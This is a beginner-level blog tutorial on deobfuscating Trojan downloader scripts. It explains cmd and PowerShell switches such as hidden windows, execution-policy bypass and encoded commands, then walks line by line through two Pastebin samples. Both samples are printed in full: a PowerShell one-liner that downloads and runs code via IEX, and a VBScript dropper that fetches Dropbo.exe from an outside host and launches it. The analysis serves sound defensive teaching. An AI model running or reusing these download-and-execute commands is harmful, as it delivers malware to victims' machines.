Sunday, December 23, 2018

Deobfuscating Trojan downloader scripts i.e. basics to get you started




This is an entry level view to understand scripting used by downloaders and by other malware. I assume no previous knowledge of scripting and the goal is to make the reader familiar with this topic. First I introduce scripting engines (shells) commonly used by downloaders. At the end I provide a few step-through of selected samples.

Commands and command line switches found in malware

First a few words about notation:
·        * DOS commands may use either forward slash (/) or hyphen (-) as a switch character, so cmd.exe /c and cmd.exe -c are the same commands. Powershell uses only hyphen (-)
·        * commands are written in lowercase, if possible. In the real samples, it is common that they are written in mixed case for example: C:\WiNDOws\sYStEm32\CMD.EXE /C. In general the scripting languages are case-insensitive
·        * Powershell has a "standard form" for commands for example Invoke-Command which may be written as invoke-command in this document
·        * as a rule of thumb DOS and Vbscript use double-quotes with strings and Powershell uses single-quotes. There are however exceptions for this rule

DOS Commands

cmd.exe /c [string]
/c   Carries out the command specified by string and then terminates command shell.
start.exe /b [string]    Starts a separate window to run a specified program or command
/b   Start application without creating a new window

Powershell

About notation:
·         commands and command switches are represented both with their shortest and full form for example -w[indowstyle] means that the switch can be between -w and -windowstyle and it may contain any number of characters from [indowstyle] part like -wind

powershell -noexit -nol  -noninteractiv  -noprofile  -execution  bypass  -windows hidden [string] |IEX
-noe[xit]                      Doesn't exit after running commands
-nol[ogo]                     Hides the copyright banner at startup
-noni[nteractive]         Doesn't present an interactive prompt to the user
-nop[rofile]                 Doesn't load the PowerShell profile
-ex[ecutionpolicy]      Sets the default execution policy for the current session and saves it in the          $env:PSExecutionPolicyPreference environment variable. Value bypass: nothing is blocked and there are no warnings or prompts.
-w[indowstyle]           Sets the window style for the session. Value hidden: no window is shown
[string]                       A command string or script block
IEX                            Invoke-Expression command

powershell.exe -nop -w hidden -c [string]
-c[ommand]             Executes the specified commands (with any parameters) as though they were typed at the PowerShell command prompt.

powershell -nop -sta -w 1 -enc [string]
-sta                           Starts PowerShell using a single-threaded apartment. This is usually obsolete setting to distract analysis
-e[ncodedcommand] Accepts a base-64-encoded string as a command
-w 1                          Same as -windows hidden, now the value hidden is replaced with a numeric constant

A sample step-through

Here is a very simple downloader sample which I found at Pastebin.

powershell.exe -nop -w hidden -c $l=new-object net.webclient;$l.proxy=[Net.WebRequest]::GetSystemWebProxy();$l.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $l.downloadstring('http://192.168.0.10:8080/E1Y8TdrQEfw');

For the sake of clarity I have divided a single long string with linebreaks. I have also added linenumbers.

1. powershell.exe -nop -w hidden -c
2. $l=new-object net.webclient;
3. $l.proxy=[Net.WebRequest]::GetSystemWebProxy();
4. $l.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;
5. IEX $l.downloadstring('http://192.168.0.10:8080/E1Y8TdrQEfw');

Steps:
1. Invoke Powershell with no execution policy, hidden window and execute following commands
2. Create a WebClient object and assign object to variable l
3. Assign proxy settings to variable I's proxy property
4. Set proxy credentials
5. Invoke expression "I.downloadstring" which has string parameter 'http://192.168.0.10:8080/E1Y8TdrQEfw'


Here is another sample from Pastebin.

Set usdbzw = CreateObject("WScript.Shell")

usdbzw.Run "powershell $gscbut = New-Object -ComObject Msxml2.XMLHTTP; $hgttbdy = New-Object -ComObject ADODB.Stream; $zteyxhj = $env:temp + '\Dropbo.exe';$gscbut.open('GET', 'http://team.hitweb.it/tes2t?12143', $false);$gscbut.send(); if($gscbut.Status -eq "200"){$hgttbdy.open();$hgttbdy.type = 1;$hgttbdy.write($gscbut.responseBody);$hgttbdy.position = 0;$hgttbdy.savetofile($zteyxhj);$hgttbdy.close();} Start-Process $zteyxhj;",0, true

Here is the sample with linebreaks and linenumbers.

1.  Set usdbzw = CreateObject("WScript.Shell")
2.  usdbzw.Run
3.    "powershell
4.    $gscbut = New-Object -ComObject Msxml2.XMLHTTP;
5.    $hgttbdy = New-Object -ComObject ADODB.Stream;
6.    $zteyxhj = $env:temp + '\Dropbo.exe';
7.    $gscbut.open('GET', 'http://team.hitweb.it/tes2t?12143', $false);
8.    $gscbut.send();
9.    if($gscbut.Status -eq "200")
10.     {$hgttbdy.open();
11.      $hgttbdy.type = 1;
12.      $hgttbdy.write($gscbut.responseBody);
13.      $hgttbdy.position = 0;
14.      $hgttbdy.savetofile($zteyxhj);
15.      $hgttbdy.close();}
16.   Start-Process $zteyxhj;"
17. ,0, true

Steps:
1.-2. and 17. Create VBScipt shell object and execute string. Create no window and wait the script to finish
3. The string contains Powershell script
4. Create XMLHTTP object
5. Create ADODB.Stream object
6. Create a temporary file %TEMP%\Dropbo.exe
7.-8. Open HTTP connection
9. Check if the connection was established
10.-15. Read the HTTP response stream and write it to temporary file %TEMP%\Dropbo.exe
16. Execute %TEMP%\Dropbo.exe

No comments: